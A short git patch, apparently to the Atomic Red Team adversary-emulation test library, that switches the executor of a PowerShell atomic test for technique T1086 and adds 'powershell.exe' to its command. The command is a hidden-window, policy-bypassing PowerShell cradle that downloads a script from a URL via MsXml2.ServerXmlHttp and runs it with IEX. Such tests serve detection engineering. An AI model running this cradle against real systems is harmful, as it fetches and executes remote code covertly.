From 165ab03d683fb9d4b77e4ab945f3349da581c8e1 Mon Sep 17 00:00:00 2001
From: Michael Haag
 <“mike@redcanary.com  git config --global user.name “Michael Haag>
Date: Wed, 5 Sep 2018 14:58:05 -0400
Subject: [PATCH] t1086

fixed a executor
---
 atomics/T1086/T1086.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/atomics/T1086/T1086.yaml b/atomics/T1086/T1086.yaml
index 7cef398a..0ccd5b72 100644
--- a/atomics/T1086/T1086.yaml
+++ b/atomics/T1086/T1086.yaml
@@ -132,9 +132,9 @@ atomic_tests:
       default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1
 
   executor:
-    name: powershell
+    name: command_prompt
     command: |
-      IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
+      powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
 
 - name: Powershell XML requests
   description: |